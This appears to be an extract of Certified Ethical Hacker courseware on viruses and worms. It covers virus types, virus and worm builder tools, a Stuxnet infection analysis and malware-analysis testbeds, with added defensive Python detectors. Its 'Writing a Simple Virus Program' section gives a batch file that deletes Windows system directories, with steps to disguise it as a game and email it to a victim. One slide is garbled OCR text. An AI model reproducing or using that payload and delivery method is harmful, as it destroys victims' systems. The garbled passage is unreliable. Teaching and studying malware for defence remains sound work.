Here is what happens: Suppose a companion virus is executing on your PC and decides it is time to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file called PGM.COM, containing the virus. The virus usually plants this file in the same directory as the .EXE file, but it could place it in any directory on your DOS path. If you type PGM and press Enter, DOS executes PGM.COM instead of PGM.EXE. (In order, DOS will execute COM, then EXE, and then BAT files of the same root name, if they are all in the same directory.) The virus executes, possibly infecting more files, and then loads and executes PGM.EXE. The user probably would fail to notice anything is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system.
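The detection the last sentence points at, as an added example that is not from the source: model the DOS lookup order (first PATH directory with a match, COM before EXE before BAT within it) and flag every EXE whose bare name would actually run a COM, whether that COM sits beside the EXE or in an earlier PATH directory. The directory layout is constructed; fs_listing() is the backend for a real file system.

```python
import os

# Search order DOS applies within one directory for a bare command name, as the text states.
PRECEDENCE = (".com", ".exe", ".bat")


def resolve(command, path_dirs, listing):
    """Return the file DOS would run for `command`: the first PATH directory holding a
    COM, EXE or BAT of that name, and within it COM before EXE before BAT."""
    wanted = command.lower()
    for directory in path_dirs:
        names = {n.lower() for n in listing(directory)}
        for ext in PRECEDENCE:
            if wanted + ext in names:
                return os.path.join(directory, wanted + ext)
    return None


def find_companions(path_dirs, listing):
    """Flag every EXE whose bare name resolves to a COM instead: the companion pattern.
    Returns (directory, exe_name, path_that_actually_runs) triples in PATH order."""
    findings = []
    for directory in path_dirs:
        for name in sorted(listing(directory)):
            stem, ext = os.path.splitext(name)
            if ext.lower() != ".exe":
                continue
            runs = resolve(stem, path_dirs, listing)
            if runs is not None and runs.lower().endswith(".com"):
                findings.append((directory, name, runs))
    return findings


def fs_listing(directory):
    """Listing backend for a real file system (a missing directory counts as empty)."""
    try:
        return os.listdir(directory)
    except OSError:
        return []


# Constructed layout standing in for a DOS PATH of three directories.
SAMPLE_PATH = ["DOS", "APPS", "UTIL"]
SAMPLE_FS = {
    "DOS": ["FDISK.EXE", "TOOL.COM"],            # TOOL.COM shadows UTIL's TOOL.EXE via PATH order
    "APPS": ["PGM.EXE", "PGM.COM", "EDIT.EXE"],  # the PGM.COM case from the text
    "UTIL": ["TOOL.EXE", "SAFE.EXE"],
}


def sample_findings():
    return find_companions(SAMPLE_PATH, lambda d: SAMPLE_FS.get(d, []))


if __name__ == "__main__":
    for directory, exe, runs in sample_findings():
        print(f"{directory}: {exe} is shadowed by {runs}")
```

On a live system pass the PATH directories and fs_listing in place of the constructed data.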
FIGURE 7.15: Working of Companion/Camouflage Viruses (the attacker's virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory beside Notepad.exe)
Shell Viruses

Virus code forms a shell around the target host program's code, making itself the original program and the host code its subroutine. Almost all boot program viruses are shell viruses.

A shell virus code forms a layer around the target host program's code that can be compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.

FIGURE 7.16: Working of Shell Viruses (before infection: Original Program; after infection: Virus Code wrapped around Original Program)
File Extension Viruses

Source: http://www.cknow.com/vtutor/FileExtensions.html

- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT
- If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file that could do serious damage

The countermeasure is to turn off "Hide file extensions" in Windows, as shown in the following screenshot:
FIGURE 7.17: Uncheck Hide File Extensions (Folder Options, View tab, Advanced settings: "Hide extensions for known file types" unchecked)
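A defender-side check for the BAD.TXT.VBS case above, added here as an example and not taken from the source. It models extension hiding with a simplified list of "known" types (an assumption; Explorer's real list is the registered file types), flags names whose displayed form looks like a document while the real extension is executable, and on Windows reads the per-user HideFileExt registry value behind the countermeasure.

```python
import sys

# Extensions Windows runs directly; a file whose real extension is one of these but whose
# displayed name ends in a document extension is the BAD.TXT.VBS case from the text.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".wsh", ".hta"}
DOCUMENT_EXTS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".jpeg", ".png", ".xls", ".xlsx"}


def split_name(filename):
    """Return (stem, real_extension) with the extension lower-cased; '' if there is none."""
    stem, dot, ext = filename.rpartition(".")
    if not dot or not stem:
        return filename, ""
    return stem, "." + ext.lower()


def displayed_name(filename, hide_known_extensions=True):
    """What Explorer shows. Simplification (assumption): every extension in the two sets
    above is a 'known file type' whose extension is hidden when the option is on."""
    stem, ext = split_name(filename)
    if hide_known_extensions and ext in EXECUTABLE_EXTS | DOCUMENT_EXTS:
        return stem
    return filename


def is_masquerading(filename):
    """True when the real extension is executable and the displayed name still ends in a
    document extension, so a user with hidden extensions sees a harmless-looking file."""
    _, real_ext = split_name(filename)
    if real_ext not in EXECUTABLE_EXTS:
        return False
    _, shown_ext = split_name(displayed_name(filename))
    return shown_ext in DOCUMENT_EXTS


def triage_attachments(names):
    """Filter a list of attachment names down to the ones worth blocking or inspecting."""
    return [n for n in names if is_masquerading(n)]


def hide_file_ext_enabled():
    """Read the per-user setting behind 'Hide extensions for known file types'. Returns
    True/False on Windows and None elsewhere. Assumed location: HKCU\\Software\\Microsoft\\
    Windows\\CurrentVersion\\Explorer\\Advanced, value HideFileExt (1 = hidden)."""
    if sys.platform != "win32":
        return None
    import winreg
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
        value, _ = winreg.QueryValueEx(key, "HideFileExt")
    return value == 1


if __name__ == "__main__":
    # Constructed attachment names for the demonstration.
    sample = ["BAD.TXT.VBS", "report.txt", "setup.exe", "photo.jpg.exe", "README"]
    for name in sample:
        print(f"{name:16} shown as {displayed_name(name):12} masquerading={is_masquerading(name)}")
    print("HideFileExt enabled:", hide_file_ext_enabled())
```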
Add-on and Intrusive Viruses

Add-on Viruses

Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their own code at the beginning.

Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus replaces the startup information of the host code with a jump to itself, but it does not touch the host code. As a result, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.

FIGURE 7.18: Working of Add-on Viruses (Original Program; after infection the viral code runs first and then JUMPs to the Original Program)
Intrusive Viruses

Intrusive viruses overwrite the host with their own code, either by completely replacing the target host's program code or sometimes overwriting only part of it. Therefore, the original code is not executed properly.

FIGURE 7.19: Working of Intrusive Viruses (Original Program; after infection part or all of the Original Program is overwritten by virus code)
Transient and Terminate and Stay Resident Viruses

Basic Infection Techniques

Direct Action or Transient Virus: transfers control to the host code where it resides, selects the target program to be modified, and corrupts it.

Terminate and Stay Resident Virus (TSR): remains permanently in memory during the entire work session, even after the target host program is executed and terminated; it can be removed only by rebooting.

Transient Viruses

Transient viruses transfer all control to the host code where they reside, select the target program to be modified, and corrupt it.

Terminate and Stay Resident Virus (TSR)

TSR viruses remain permanently in memory during the entire work session, even after the target host program is executed and terminated. They can be removed only by rebooting the system.
Writing a Simple Virus Program

For demonstration purposes, a simple program that can be used to cause harm to a target system is shown here:

1. Create a batch file Game.bat with the following text:

   @echo off
   del c:winntsystem32*.*
   del c:winnt*.*

2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Assign an icon to Game.com using the Windows file properties screen
4. Send the Game.com file as an email attachment to a victim
5. When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable

The victim would have to reinstall Windows, causing problems for already saved files.
TeraBIT Virus Maker

TeraBIT Virus Maker is a virus-generating tool whose output is mostly detected by all antivirus software when scanned. The viruses it produces mostly don't harm the PC, but they can disable the antivirus that is installed on the system for a short time.

FIGURE 7.20: TeraBIT Virus Maker (screenshot of the option list, e.g. Disable Windows Security Center, Disable Task Manager, Disable Windows Firewall, Format All Hard Drives, Run Custom Command, Create Virus)
  • 61. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker JPS Virus M aker and DELmE's Batch Virus M aker IP (Vu Mkr3 ) S ir s a e .0 n co ?‫| *ץי‬O rO o f to < ‫ נ‬V p r e ‫י‬ 0 ie b s Me ncs t lceu c e ®ciofl 1Sa UwB n QneUrpord et o w p jlos iag s « rr | > h n Sa LclD | Sa W Ugc Oe14D T»| pmoa a k ( * * tSx pn0c a « 3 ka RstTe ee « n SaPre | paat r Py nPoo bWXSn N SnSa | * e riffte Cr eF &e»n| e edpm t dU oto ie 4n3s BeSre O e HeDcnrsFld U cen fDih| M ouet oe r H. .Pt | i* M f O • D M | DcoJT M fe # o m etA 4 m c Mt•il XlFa | D t M.M Fa e A mf a ee p f le 3 e M(• l Pg m | D t M be Im e A hM e e eF le TeL*Rsat 1 DMtWl h a etr ee d D t M ouet D t M uc e e y cms1 e e yM le D n le n D t HPfM | ae r m la Dls« **>«| a tM D t *Is*M | ee la m C A c is | ra Crp DMMPan | c e yc u ! ‫ זיי‬FtcioTDa MM( ‫ יח‬roano « * g ‫״‬ * (M•| d a v t ‫יין‬ Mte | |tf a fr l« ” O t | |nl a e «f la 0 FV»ta< O Loo Off V 5A rIr^ I I ‫יייי‬ r* 'le H 0 Turn Off O Hibiinofco 0 No‫־׳‬e fl Sre Nm I^ o o ^ evr a o rd T x -H 0WNea » • opd t D t C utr | e ea la la lc o D t Acm e ect le O ttP l M v IMt.U• - c( (M•| M D» | *a Mt• | a D i•od | a W la DtO a e eu k la llo 0* S * e rf» | wfig y o c m g fe y o w & cm o| 9 0 0 J P S V iru s M a k e r D E L m E 's B a tc h V iru s M a k e r Copyright @ by E lrC lM K i. All Rights Reserved. Reproduction is Strictly Prohibited. JP S V i r u s M a k e r a n d D E L m E 's B a t c h V i r u s M a k e r JP S Virus M a k e r JPS V ir u s M a k e r is a t o o l t o c r e a t e v ir u s e s . It a lso has a f e a t u r e t o c o n v e r t a v ir u s i n t o a w o r m a n d can be u sed t o d is a b l e t h e n o r m a l h a r d w a r e o f t h e s y s te m . M odule 07 Page 1066 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
• 62. FIGURE 7.21: JPS Virus Maker screenshot. The screenshot of JPS Virus Maker 3.0 shows its checkbox list of effects: Disable Registry, MsConfig, Task Manager, Yahoo, Media Player, Internet Explorer, Time, Group Policy, Windows Explorer, Norton AntiVirus, McAfee AntiVirus, Notepad, Wordpad, Windows, DHCP client, Taskbar, Start Button, MSN Messenger, CMD, Security Center, System Restore, Control Panel, Desktop Icons, Screen Saver; Hide Services, Outlook Express, Windows Clock, Desktop Icons, All Processes in Taskmgr, All Tasks in Taskmgr, Run, Cursor; Change Explorer Caption; Remove Folder Options; Lock Mouse & Keyboard; Mute Sound; Always CD-ROM; Turn Off Monitor; Crazy Mouse; Destroy Taskbar, Offlines (Y! Messenger), Protected Storage, Audio Service, Clipboard; Terminate Windows; Swap Mouse Buttons; Clear Windows XP; Auto Startup; an action after install (Restart, Log Off, Turn Off, Hibernate, None); plus Name After Install, Server Name, and the output file name (Sender.exe).

DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice of .bat file viruses to suit your tasks.

FIGURE 7.22: DELmE's Batch Virus Maker screenshot. The screenshot shows its menu of options (for example Change User Password, Swap Mouse Buttons, Hide Documents Folder, Delete Doc Files, Change Home Page, Open Web Page, and an AUTOEXEC.BAT entry) and the generated batch text, a series of echo lines that assemble a .bat file and then start it.
• 63. Module Flow. Prior to this, we discussed various types of viruses. Now we will discuss computer worms and how they differ from viruses. (Module flow: Virus and Worms Concepts, Types of Viruses, Computer Worms, Malware Analysis, Countermeasures, Penetration Testing.) This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm Maker Thing).
• 64. Computer Worms. Computer worms are malicious programs that replicate, execute, and spread across network connections on their own, without human interaction. Most worms are written only to replicate and spread across a network, consuming available computing resources; some, however, carry a payload that damages the host system. A worm does not require a host program to replicate, although one may argue that a worm's host is the machine it has infected. This module treats worms as a subtype of virus. Worms were once mainly a mainframe problem, but once most of the world's systems were interconnected they were aimed at the Windows operating system and spread through email, IRC, and other network services.

Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and assembles a botnet; such botnets are then used to carry out further cyber-attacks.
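The spreading behaviour described above is also what gives a worm away on the wire: one source contacting many distinct hosts on the same service port in a short time. The detector below is an added example (not code from the page or from any product it names); it runs a sliding-window fan-out count over constructed flow records. The record format, the addresses, the 445/tcp port and the thresholds are assumptions chosen for the illustration.

```python
"""Fan-out detector for worm-style lateral spread over constructed flow records.
Added example; not code from the page or from any product it names."""
from collections import Counter, defaultdict

# Constructed flow records: "<epoch> <src> <dst> <dport> <proto>".
# 10.0.0.5 touches twelve distinct hosts on 445/tcp inside 12 seconds (worm-like);
# 10.0.0.7 talks to one file server repeatedly (normal); 10.0.0.9 touches three hosts.
SAMPLE_FLOWS = "\n".join(
    [f"{1350000000 + i} 10.0.0.5 10.0.0.{10 + i} 445 tcp" for i in range(12)]
    + [f"{1350000000 + 2 * i} 10.0.0.7 10.0.0.50 445 tcp" for i in range(12)]
    + [f"{1350000000 + 5 * i} 10.0.0.9 10.0.0.{60 + i} 445 tcp" for i in range(3)]
    + ["1350000003 10.0.0.5 10.0.0.200 80 tcp"]   # other port, ignored by the 445 rule
)


def parse_flows(text):
    """Parse the constructed record format into (ts, src, dst, dport, proto) tuples."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = line.split()
        flows.append((int(ts), src, dst, int(dport), proto))
    return flows


def max_fanout(events, window):
    """events: time-sorted (ts, dst) pairs for one source. Returns the largest
    number of distinct destinations seen inside any window of `window` seconds."""
    best, left = 0, 0
    live = Counter()                      # destinations currently inside the window
    for ts, dst in events:
        live[dst] += 1
        while ts - events[left][0] > window:   # slide the left edge forward
            old = events[left][1]
            live[old] -= 1
            if live[old] == 0:
                del live[old]
            left += 1
        best = max(best, len(live))
    return best


def worm_fanout(flows, dport=445, proto="tcp", window=60, threshold=10):
    """Return {src: fanout} for sources that reached >= threshold distinct
    hosts on dport/proto inside a single window."""
    per_src = defaultdict(list)
    for ts, src, dst, port, pr in flows:
        if port == dport and pr == proto:
            per_src[src].append((ts, dst))
    hits = {}
    for src, events in per_src.items():
        events.sort()
        fanout = max_fanout(events, window)
        if fanout >= threshold:
            hits[src] = fanout
    return hits


if __name__ == "__main__":
    print(worm_fanout(parse_flows(SAMPLE_FLOWS)))   # {'10.0.0.5': 12}
```

The same loop works on any flow export once `parse_flows` is adapted to it; the point is the per-source distinct-destination count inside a window, which separates a spreading host from a busy client that hits one server repeatedly.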
• 65. How Is a Worm Different from a Virus? A worm replicates on its own; a virus does not. A worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

TABLE 7.1: Difference between Viruses and Worms
Virus: a file that cannot spread to other computers unless an infected file is replicated and actually sent to the other computer. Worm: once installed on a system, it replicates itself and spreads using IRC, Outlook, or other applicable mailing programs.
Virus: files such as .com, .exe, or .sys, or a combination of them, are corrupted once the virus runs on the system. Worm: typically does not modify any stored programs.
Virus: much harder to get off an infected machine. Worm: compared to a virus, can be removed from the system more easily.
Virus: far fewer spreading options than a worm, because a virus only infects files on the machine. Worm: more spreading options than a virus.
• 66. Worm Analysis: Stuxnet. Source: http://www.symantec.com. Stuxnet is a threat targeting a specific industrial control system, likely in Iran, such as a gas pipeline or power plant. The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely outside their specified boundaries. Stuxnet is a complex threat with diverse modules and functionalities. It is used to take control of and reprogram industrial control systems (ICS) by modifying code on PLCs, which gives the attacker a way into the complete system and lets them change its code and take unauthorized control without the operators' knowledge.

Stuxnet contains many features, such as:
1. Self-replicates through removable drives by exploiting a vulnerability that allows auto-execution (the Windows Shell .LNK vulnerability, MS10-046)
2. Spreads in a LAN through a vulnerability in the Windows Print Spooler (MS10-061)
3. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067)
4. Copies and executes itself on remote computers through network shares, and on computers running a WinCC database server
5. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
6. Updates itself through a peer-to-peer mechanism within a LAN
7. Exploits a total of four then-unpatched (zero-day) Microsoft vulnerabilities
8. Contacts a command and control server that allows the attacker to download and execute code, including updated versions
9. Contains a Windows rootkit that hides its binaries and attempts to bypass security products
10. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system
• 68. Worm Analysis: Stuxnet (Cont'd). Source: http://www.symantec.com. Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks. It hooks Ntdll.dll to monitor for requests to load specially crafted file names; these file names are mapped to another location instead, a location specified by W32.Stuxnet. The dropper component of Stuxnet is a wrapper program that contains all of these components stored inside itself in a section named "stub". When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls that particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior-blocking and host intrusion-protection technologies that monitor LoadLibrary calls.
• 69. Worm Analysis: Stuxnet (Cont'd). Source: http://www.symantec.com. Infection Routine Flow. Stuxnet first checks whether it has administrator rights on the computer. It wants to run with the highest privilege possible so that it has permission to take whatever actions it likes. If it does not have administrator rights, it executes one of the two zero-day escalation-of-privilege attacks described below. If the process already has the rights it requires, it proceeds to prepare the call to export 16 in the main .dll file, using the injection techniques described in the Injection Technique section.

When the process does not have administrator rights, it tries to obtain them with one of two zero-day escalation-of-privilege attacks; the vector used depends on the operating system of the compromised computer. On Windows Vista, Windows 7, or Windows Server 2008 R2, the Task Scheduler escalation-of-privilege vulnerability (undisclosed at the time of the analysis) is exploited. On Windows XP, the win32k.sys escalation-of-privilege vulnerability (likewise undisclosed at the time) is exploited.

• 70. If exploited, both vulnerabilities result in the main .dll file running as a new process: inside the csrss.exe process in the case of the win32k.sys vulnerability, or as a new task with administrator rights in the case of the Task Scheduler vulnerability. The code that exploits the win32k.sys vulnerability is stored in resource 250. Details of both vulnerabilities were withheld at the time of the analysis because patches were not yet available.

After export 15 completes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version number on the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step 7 process to infect all Step 7 projects; sets up the global mutexes used to communicate between the different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid, then checks the value "NTVDM TRACE" in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation; if that value equals 19790529, the threat exits.

FIGURE 7.23: Infection Routine Flow. The diagram shows the installer's decision chain: check the configuration; if the registry value NTVDM TRACE equals 19790529, exit; check the operating system (XP or lower versus Vista or higher) and set the corresponding DACL or SACL; if the date is not earlier than 06/24/2012 (past deadline), exit; otherwise decrypt resources 201 and 242 and write them to disk as the rootkit files (MrxNet.sys and MrxCls.sys), create the .pnf (Oem7a.pnf) and .cfg files, set the file times, create the rootkit service registry keys and the global mutexes, inject into the service process and call export 32 to infect removable drives, inject into Step 7 and call export 32 to infect Step 7 projects, then decrypt and load itself from disk, call export 6 to get the version, and compare the running version number with the version on disk.
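The gating logic of the installer described above (privilege check, the NTVDM TRACE registry marker, the 06/24/2012 deadline) is small enough to model directly, and the model doubles as a checklist for a host investigation. The code below is an added example: it is not Symantec's code, not the worm's, and the HostSnapshot class is a constructed stand-in for data that registry and file-system tooling would collect on a real machine. The registry path, the marker value, the deadline and the file names are the ones given in the text; that the installer exits when the marker matches is Symantec's finding, and writing the marker yourself is the "vaccination" it implies.

```python
"""Decision model of the pre-installation checks of Stuxnet's installer (export 16),
plus an indicator lookup on a host snapshot. Added example; HostSnapshot is a
constructed stand-in for real registry and file-system collection."""
from dataclasses import dataclass
from datetime import date

SPREAD_DEADLINE = date(2012, 6, 24)                 # Date<06/24/2012 is required, else exit
IMMUNITY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation"
IMMUNITY_VALUE = "NTVDM TRACE"
IMMUNITY_MARKER = 19790529                          # installer exits when the value equals this
ROOTKIT_DRIVERS = ("mrxnet.sys", "mrxcls.sys")      # decrypted from resources 201 and 242
DROPPED_FILES = ("oem7a.pnf",)                      # .pnf written alongside the rootkit files


@dataclass
class HostSnapshot:
    is_admin: bool      # does the running process hold administrator rights?
    os_family: str      # "xp" or "vista+" (Vista, 7, Server 2008 R2)
    today: date
    registry: dict      # {(key, value_name): data}; flat, constructed view of the registry
    drivers_dir: set    # lower-case file names from %SystemRoot%\system32\drivers
    inf_dir: set        # lower-case file names from %SystemRoot%\inf


def installer_path(host):
    """Return the sequence of actions the installer takes on this host."""
    steps = []
    if not host.is_admin:
        # one of two zero-day escalation vectors, chosen by operating system
        if host.os_family == "xp":
            steps.append("escalate: win32k.sys (payload runs inside csrss.exe)")
        else:
            steps.append("escalate: Task Scheduler (payload runs as a new task with admin rights)")
    # export 16: configuration assumed valid here, then the registry marker, then the date
    if host.registry.get((IMMUNITY_KEY, IMMUNITY_VALUE)) == IMMUNITY_MARKER:
        steps.append("exit: immunity marker present")
        return steps
    if host.today >= SPREAD_DEADLINE:
        steps.append("exit: past deadline")
        return steps
    steps += [
        "decrypt resources 201 and 242, write rootkit drivers and .pnf/.cfg files, set file times",
        "create rootkit service registry keys and global mutexes",
        "inject into services.exe and call export 32: infect removable drives",
        "inject into Step 7 process and call export 32: infect Step 7 projects",
    ]
    return steps


def immunize(registry):
    """Write the marker that makes the installer exit; returns the updated registry view."""
    registry[(IMMUNITY_KEY, IMMUNITY_VALUE)] = IMMUNITY_MARKER
    return registry


def scan_indicators(host):
    """Host-level artefacts of a completed installation, in a fixed order."""
    found = [f"rootkit driver {n}" for n in ROOTKIT_DRIVERS if n in host.drivers_dir]
    found += [f"dropped file {n}" for n in DROPPED_FILES if n in host.inf_dir]
    return found


if __name__ == "__main__":
    host = HostSnapshot(False, "xp", date(2010, 9, 1), {}, set(), set())
    print(installer_path(host))
    print(installer_path(HostSnapshot(True, "xp", date(2010, 9, 1), immunize({}), set(), set())))
```

The two exit branches are the defensively interesting ones: a registry value the installer respects, and a hard date after which it stops spreading, both of which an analyst can confirm in a sandbox by varying only those inputs.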
• 71. Worm Maker: Internet Worm Maker Thing. Internet Worm Maker Thing (Version 4.00, Public Edition) is a tool specifically designed for generating a worm. The generated Internet worms try to spread over networks; they are essentially preset invasion proxy attacks that target a host, poison it, establish a base, and plan to launch further attacks in the future. The worms work independently. An Internet worm sends copies of itself via vulnerable computers on the Internet.

• 72. FIGURE 7.24: Internet Worm Maker Thing. The screenshot shows the builder's option panels: payload selection with an activation date; startup methods (Global Registry Startup, Local Registry Startup, Winlogon Shell Startup); infection options (Infect Bat Files, Infect Vbs Files, infect drives); system-tampering and anti-AV options (Disable Task Manager, Disable Shutdown, Disable Logoff, Hide All Drives, Disable Keyboard, Disable Mouse, Disable Windows Security, Uninstall Norton Script Blocking, Open CD Drives, Lock Workstation, Change Computer Name, Change Reg Owner, Change Wallpaper, Change Homepage, Download File, Message Box title and text); custom code; output file name, icon and output path; and the Generate button that produces the worm.
• 73. Module Flow. Malware analysis is defined as the action of taking malware apart to study it. It is usually performed for various reasons: to find the vulnerabilities that were exploited to spread the malware, to learn what information was stolen, and to decide on prevention techniques that keep it from entering the system or network in the future. (Module flow: Virus and Worms Concepts, Types of Viruses, Computer Worms, Malware Analysis, Countermeasures, Penetration Testing.) Detailed information about the malware analysis procedure is explained in the next few slides.
• 74. What Is a Sheep Dip Computer? Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware. The "sheep dipped" computer is isolated from the other computers on the network so that any malware it handles cannot reach them. Before the procedure is carried out, any downloaded programs are saved on external media such as CD-ROMs or floppy diskettes. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software, and connects to a network only under strictly controlled conditions. A sheep dip computer:
- Runs port and network monitors
- Runs user, group permission, and process monitors
- Runs device driver and file monitors
- Runs registry and kernel monitors
• 75. Antivirus Sensor Systems. An antivirus system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. Such systems are used along with sheep dip computers.

FIGURE 7.25: Working of Antivirus Sensor Systems. The diagram places the antivirus system between the internal network (System 1, System 2, System 3) and the Internet; it bundles antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing and email-scanner components, passes allowed traffic through to the network, and reflects (blocks) malicious traffic.

• 76. An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, an email scanner, and so on. Usually it is placed between the network and the Internet. It allows only genuine traffic to flow into the network and blocks malicious traffic from entering, and so contributes to network security.
• 77. Malware Analysis Procedure: Preparing Testbed. Malware analysis provides an in-depth understanding of each individual sample and identifies emerging technical trends from large collections of malware samples. The samples are mostly Windows binary executables. Malware analysis is conducted with a variety of goals. The procedure for preparing a testbed is:
1. Install VMware or Virtual PC on the system
2. Install the guest OS into the Virtual PC/VMware
3. Isolate the system from the network by ensuring that the NIC card is in "host only" mode
4. Disable the shared folders and the guest isolation features (drag-and-drop and copy/paste between host and guest)
5. Copy the malware over to the guest OS
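Steps 3 and 4 of the procedure above end up as a handful of settings in the guest's configuration file, and it is worth checking them before a sample is copied in rather than trusting what the GUI showed last time. The linter below is an added example, not code from the page or from VMware: it parses a VMware .vmx file and reports deviations from the testbed rules. The key names are the ones VMware Workstation writes for these settings (assumed here; verify them against your version), and the "before" and "after" configurations are constructed.

```python
"""Check a VMware .vmx file for the testbed isolation settings (host-only NIC,
no shared folders, guest isolation off). Added example, not VMware's code."""
import re

# What the testbed steps require of the guest configuration.
# Key names as written by VMware Workstation; verify against your version.
REQUIRED = {
    "ethernet0.connectionType": "hostonly",            # step 3: NIC in host-only mode
    "isolation.tools.hgfsServerSet.disable": "TRUE",   # step 4: shared folders (HGFS) off
    "isolation.tools.copy.disable": "TRUE",            # step 4: copy/paste off
    "isolation.tools.paste.disable": "TRUE",
    "isolation.tools.dnd.disable": "TRUE",             # step 4: drag-and-drop off
}
EXPOSING_PREFIX = "sharedFolder"   # sharedFolderN.* entries map a host directory into the guest

VMX_LINE = re.compile(r'^\s*([\w.:-]+)\s*=\s*"(.*)"\s*$')


def parse_vmx(text):
    """Return {key: value} for the key = "value" lines of a .vmx file."""
    config = {}
    for line in text.splitlines():
        m = VMX_LINE.match(line)
        if m:
            config[m.group(1)] = m.group(2)
    return config


def check_testbed(text):
    """Return a list of findings; an empty list means the guest meets the testbed rules."""
    config = parse_vmx(text)
    findings = []
    for key, expected in REQUIRED.items():
        actual = config.get(key)
        if actual is None:
            findings.append(f'{key} missing (feature defaults to enabled); expected "{expected}"')
        elif actual.lower() != expected.lower():
            findings.append(f'{key} is "{actual}"; expected "{expected}"')
    for key, value in config.items():
        if key == "sharedFolder.maxNum":
            if value != "0":
                findings.append(f'{key} is "{value}"; shared folders are configured')
        elif key.startswith(EXPOSING_PREFIX):
            findings.append(f"{key} present: a host directory is exposed to the guest")
    return findings


# Constructed "before" configuration: NAT networking and a shared folder on the sample store
VMX_BEFORE = '''\
.encoding = "UTF-8"
displayName = "analysis-xp"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
sharedFolder0.present = "TRUE"
sharedFolder0.hostPath = "C:\\samples"
sharedFolder0.guestName = "samples"
'''

# Constructed "after" configuration meeting steps 3 and 4
VMX_AFTER = '''\
.encoding = "UTF-8"
displayName = "analysis-xp"
ethernet0.present = "TRUE"
ethernet0.connectionType = "hostonly"
isolation.tools.hgfsServerSet.disable = "TRUE"
isolation.tools.copy.disable = "TRUE"
isolation.tools.paste.disable = "TRUE"
isolation.tools.dnd.disable = "TRUE"
'''

if __name__ == "__main__":
    for name, text in (("before", VMX_BEFORE), ("after", VMX_AFTER)):
        print(name, check_testbed(text) or "OK")
```

Run it against the .vmx of the analysis guest while the VM is powered off; a missing isolation key is reported as a finding because the corresponding feature is enabled unless the key explicitly disables it.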
  • 78. Malware Analysis Procedure
Step 1: Perform static analysis when the malware is inactive.
Step 2: Collect information about:
- String values found in the binary with the help of string extracting tools such as BinText
- The packaging and compressing technique used with the help of compression and decompression tools such as UPX
BinText
Source: http://www.mcafee.com
BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful information for each item in the optional "advanced" view mode.
  • 79. FIGURE 7.26: BinText Screenshot (BinText 3.0.3, "Search" tab, listing the ASCII strings of a file by file position and memory position; "Time taken: 0.109 sec, Text size: 37340 bytes (36.46K)")
UPX
Source: http://upx.sourceforge.net
UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip.
FIGURE 7.27: UPX Working in Command Prompt. The screenshot shows upx.exe run without arguments from D:\CEH-Tools\CEHv8 Module 07 Viruses and Worms\Compression and Decompression\UPX\upx308w\upx308w>, printing its banner and usage:
    Ultimate Packer for eXecutables
    Copyright (C) 1996 - 2011
    UPX 3.08w  Markus Oberhumer, Laszlo Molnar & John Reiser  Dec 12th 2011
    Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
    Commands:
      -1     compress faster                   -9    compress better
      -d     decompress                        -l    list compressed file
      -t     test compressed file              -V    display version number
      -h     give more help                    -L    display software license
    Options:
      -q     be quiet                          -v    be verbose
      -oFILE write output to 'FILE'
      -f     force compression of suspicious files
      -k     keep backup files
    file..   executables to (de)compress
    Type 'upx --help' for more detailed help.
